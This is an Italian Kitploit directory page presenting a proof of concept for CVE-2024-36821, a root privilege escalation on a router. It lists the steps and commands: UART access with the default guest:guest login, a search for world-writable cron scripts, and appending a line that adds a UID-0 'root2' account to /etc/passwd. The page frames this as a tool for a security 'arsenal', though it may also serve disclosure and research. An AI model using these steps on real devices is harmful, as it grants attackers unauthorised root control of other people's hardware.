Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-36821 — Il riferimento pubblico che contiene le informazioni minime richieste per la vulnerabilità coperta da CVE-2024-36821 | Kitploit
Strumenti/GitHubGitHub/ivanglinkin/cve-2024-36821
Sicurezza Sistemi EmbeddedEscalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza Hardware e IoT
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

Il riferimento pubblico che contiene le informazioni minime richieste per la vulnerabilità coperta da CVE-2024-36821

Vedi Repository
32 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-36821

Il riferimento pubblico che contiene le informazioni minime richieste per la vulnerabilità coperta da CVE-2024-36821

Il video originale con la PoC puoi trovarlo sul video -> https://www.youtube.com/watch?v=6vHno0ik7JY

La PoC:

  1. Connettersi al router tramite connessione UART

  2. Usando le credenziali guest:guest, accedere al sistema

  3. Usando il comando find / -perm -777 -type f 2>/dev/null, trovare i file con permessi di lettura-scrittura-esecuzione:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Schermata 2024-06-10 alle 20 00 50
  4. Controllare il proprietario con il comando ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh

  5. Generare la password con il comando openssl passwd Abracadabra

  6. Modificare /tmp/cron/cron.everyminute/conntrack_collector.sh, aggiungendo alla fine la nuova password generata:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Schermata 2024-06-10 alle 20 05 05
  7. Attendere un minuto

  8. Passare all'utente root2 con il seguente comando

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
Scarica lo strumento